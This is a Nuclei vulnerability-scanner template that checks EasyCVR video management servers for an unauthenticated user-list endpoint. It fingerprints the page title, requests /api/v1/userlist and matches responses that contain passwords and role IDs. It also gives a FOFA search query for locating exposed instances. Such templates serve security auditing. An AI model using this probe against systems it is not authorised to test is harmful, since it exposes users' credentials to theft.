nuclei-templates/http/vulnerabilities/other/easycvr-info-leak.yaml

47 lines
1.3 KiB
YAML
Raw Normal View History

2024-06-05 04:29:33 +00:00
id: easycvr-info-leak
2024-06-05 07:50:02 +00:00
2024-06-05 04:29:33 +00:00
info:
name: EasyCVR video management - Users Information Exposure
author: pussycat0x
severity: high
description: |
EasyCVR video management platform has leaked user information
reference:
- https://github.com/wy876/POC/blob/main/EasyCVR%20%E8%A7%86%E9%A2%91%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%E5%AD%98%E5%9C%A8%E7%94%A8%E6%88%B7%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md
metadata:
verified: true
max-request: 2
fofa-query: "title=\"EasyCVR\""
2024-06-05 04:29:33 +00:00
tags: unauth,easycvr,misconfig
2024-06-05 04:54:27 +00:00
flow: http(1) && http(2)
2024-06-05 04:29:33 +00:00
http:
2024-06-05 04:54:27 +00:00
- method: GET
path:
- "{{BaseURL}}"
matchers:
2024-06-05 07:50:02 +00:00
- type: dsl
internal: true
dsl:
- 'status_code == 200'
- 'contains(body, "<title>EasyCVR")'
condition: and
2024-06-05 04:54:27 +00:00
2024-06-05 04:29:33 +00:00
- method: GET
path:
- "{{BaseURL}}/api/v1/userlist?pageindex=0&pagesize=10"
2024-06-05 04:54:27 +00:00
matchers-condition: and
2024-06-05 04:29:33 +00:00
matchers:
- type: word
words:
- "count"
- "Password"
- "RoleId"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022046b249843f377ed44069ba307e4af8c59389cfbbdde0da73f15e8d6a7c5b0d180221008c6c0da8e04c3303ad821e084013ff0e854bcafcaefdc2972e2c9c99f0e0699f:922c64590222798bb761d5b6d8e72950